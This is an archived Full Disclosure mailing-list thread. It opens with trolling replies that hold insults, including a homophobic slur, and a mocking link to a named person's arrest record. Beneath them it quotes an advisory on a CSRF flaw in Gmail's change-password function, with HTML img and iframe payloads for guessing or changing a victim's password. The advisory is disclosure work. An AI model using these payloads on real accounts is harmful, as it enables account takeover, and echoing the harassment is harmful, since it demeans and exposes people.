Full Disclosure mailing list archives
Re: Apple Safari ... DoS Vulnerability
From: "Valdis' Mustache" <security.mustache () gmail com>
Date: Wed, 4 Mar 2009 18:59:41 -0600
Rob, Our young scholar does nonetheless have some sage advice for young ladies of colour. http://www.helium.com/items/250130-advice-to-black-females I was rather alarmed at his arrest and methamphetamine abuse, however one might presume that his recent weight training is part of a rehabilitation regimen. http://www.coloradoan.com/article/20090117/NEWS01/901170316/1002/ Your humble servant, Усы из Валдис On Wed, Mar 4, 2009 at 6:44 PM, <bobby.mugabe () hushmail com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mr. Stark, You're body fat seems to be fairly high, you should consider a cutting phase and quitting the muscle milk and whatever cheap steroids you use. Your looking like a fat dumb homosexual in those tights. Someone with you're levels of insecurity shouldn't be in computer security. - -bm On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks <jstarks440 () gmail com> wrote:Ah, probably not. Your stringing together words to make sentences is what I'll regret reading. I'll continue to use my muscle milk and you'll continue to work your 9-5. The world turns once again! On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache < security.mustache () gmail com> wrote:Mister Snarks, I've never been anything but who I purport to be, the humbleupperfacial hair quadrant of a loquacious sysadmin. Low of birth,thoughnoble in aspiration, a student of history and of the manymustacheswho came before myself. You, young scholar, should be wary, though! Prospectiveemployers domake regular use of search engines, "googling" potentialcandidates togain insight into possible character flaws! True, your clean and jerk abilities as archived on the YouTubeareadmirable, but acting a fool on security lists is somethingnormallyreserved only for those in academia, who are markedly difficultif notimpossible to unseat from their comfortable chairs, asindisputablyunderscored by the e-antics of this mutache's owner, and, ofcourse,Mssr. Schmehl. You'll come to regret your lack of anonymity, as your posts willliveon for eternity, much as I've came to regret my unfortunate association with the unruly beardlike growth connecting to mefrom thesouth, and my unavoidable tenuous connection with thoseobjectionableand uncouth sideburns. Your humble servant, I baffi di Valdis On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks<jstarks440 () gmail com>wrote:I know, its insane. It is a new trend, though, just likepeopleregisteringgmail accounts just to flame and troll on FD! Its like, your credability like, goes like, ok you start likeat 0, andthenlike, it goes like to -1, and like, then even lower like. Absolutely genius. x0x0x0x0x0x0x0x0x0x On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee<biz.marqee () gmail com> wrote:This was 2 years well spent... NOT! Seriously what is with all these people popping up releasingadvisoriesthat are absolute SHIT? Is it to try and get jobs or what? On Tue, Mar 3, 2009 at :55 AM, ISecAuditors SecurityAdvisories <advisories at isecauditors.com> wrote:============================================= INTERNET SECURITY AUDITORS ALERT 2007-003 - Original release date: August 1st, 2007 - Last revised: January 11th, 2009 - Discovered by: Vicente Aguilera Diaz - Severity: 3/5 ============================================= I. VULNERABILITY ------------------------- CSRF vulnerability in GMail service II. BACKGROUND ------------------------- Gmail is Google's free webmail service. It comes with built-in Googlesearch technology and over 2,600 megabytes of storage (andgrowingevery day). You can keep all your important messages, filesandpictures forever, use search to quickly and easily findanythingyou're looking for, and make sense of it all with a new wayof viewingmessages as part of conversations. III. DESCRIPTION ------------------------- Cross-Site Request Forgery, also known as one click attackor sessionriding and abbreviated as CSRF (Sea-Surf) or XSRF, is akind ofmalicious exploit of websites. Although this type of attackhassimilarities to cross-site scripting (XSS), cross-sitescriptingrequires the attacker to inject unauthorized code into awebsite,while cross-site request forgery merely transmitsunauthorizedcommands from a user the website trusts. GMail is vulnerable to CSRF attacks in the "ChangePassword"functionality. The only token for authenticate the user isa sessioncookie, and this cookie is sent automatically by thebrowser in everyrequest. An attacker can create a page that includes requests to the"Changepassword" functionality of GMail and modify the passwordsof the userswho, being authenticated, visit the page of the attacker. The attack is facilitated since the "Change Password"request can berealized across the HTTP GET method instead of the POSTmethod that isrealized habitually across the "Change Password" form. IV. PROOF OF CONCEPT ------------------------- 1. An attacker create a web page "csrf-attack.html" thatrealize manyHTTP GET requests to the "Change Password" functionality. For example, a password cracking of 3 attempts (see"OldPasswd"parameter): ... <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& p=&save=Save"> <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro up1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123& p=&save=Save"> <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro up1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123& p=&save=Save"> ... or with hidden frames: ... <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& p=&save=Save"> <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& p=&save=Save"> <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& p=&save=Save"> ... The attacker can use deliberately a weak new password (see"Passwd"and "PasswdAgain" parameters), this way he can know if theanalysedpassword is correct without need to modify the password ofthe victimuser. Using weak passwords the "Change Password" response is: - " The password you gave is incorrect. ", if the analysedpasswordis not correct. - " We're sorry, but you've selected an insecure password.In orderto protect the security of your account, please click"PasswordStrength" to get tips on choosing to safer password. ", iftheanalysed password is correct and the victim password is notmodified.If the attacker want to modify the password of the victimuser, thewaited response message is: " Your new password has beensaved - OK ".In any case, the attacker evades the restrictions imposedby thecaptcha of the authentication form. 2. A user authenticated in GMail visit the "csrf-attack.html" pagecontrolled by the attacker. For example, the attacker sends a mail to the victim (aGMail account)and provokes that the victim visits his page (socialengineering). So,the attacker insures himself that the victim isauthenticated.3. The password cracking is executed transparently to thevictim.V. BUSINESS IMPACT ------------------------- - Selective DoS on users of the GMail service (changinguserpassword).- Possible access to the mail of other GMail users. VI. SYSTEMS AFFECTED ------------------------- Gmail service. VII. SOLUTION ------------------------- No solution provided by vendor. VIII. REFERENCES ------------------------- http://www.gmail.com IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot)com).X. REVISION HISTORY ------------------------- July 31, 2007: Initial release August 1, 2007: Fewer corrections. December 30, 2008: Last details. XI. DISCLOSURE TIMELINE ------------------------- July 30, 2007: Vulnerability acquired by Internet Security Auditors. August 1, 2007: Initial notification sent to the Google security team. August 1, 2007: Google security team request additional information. about and start review thevulnerability.August 13, 2007: Request information about the status. August 15, 2007: Google security team responds that theyare stillworking on this. September 19, 2007: Request for the status. No response. November 26, 2007: Request for the status. No response. January 2, 2008: Request for the status. No response. January 4, 2008: Request for the status. No response. January 11, 2008: Request for the status. No response. January 15, 2008: Request for the status. Automatedresponse.January 18, 2008: Google security team informs that don'texpectbehaviour to change in the short termgivingthe justification. We deconstruct those arguments asinsufficient.No more responses. December 30, 2008: Request for the status. Confirmationfrom Googlethey won't change the considerationabout this.January 11, 2009: Publication to Bugtraq. Rejected twice. No reasons. March 03, 2009: General publication for disclosure inother lists.XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied"as-is"with no warranties or guarantees of fitness of use orotherwise.Internet Security Auditors accepts no responsibility forany damagecaused by the use or misuse of this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmvIAQACgkQhNp8gzZx3sifPQP/Z/JwoxHfL+/YWIumE6ohkDzHigcM FFMGnJtPy1PUYahP2Kkq4oBUiFgNsqWsBjvNnp+hrILgO6w73OasuLZQSvYX7hCMK8k1 eK7r0H5fjSlqoRhkJSGhgBDL4H7q1nMrkr0x4zGO7Jeeeq8DuU23x2A1UvnJCE+RAo65 vFaHNwE= =uYwk -----END PGP SIGNATURE----- -- Click to find information on your credit score and your credit report.
http://tagline.hushmail.com/fc/BLSrjkqeNwyn7W35g2EhsFTPSKje8aswj4QTZvrXUmflUijsGrXajBFpRZG/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Apple Safari ... DoS Vulnerability, (continued)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 03)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 03)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 03)
- Re: Apple Safari ... DoS Vulnerability Biz Marqee (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Jason Starks (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Valdis' Mustache (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Jason Starks (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Jason Starks (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Chris Evans (Mar 04)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 04)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 04)
- Re: Apple Safari ... DoS Vulnerability Valdis' Mustache (Mar 04)
- Re: Apple Safari ... DoS Vulnerability bobby . mugabe (Mar 04)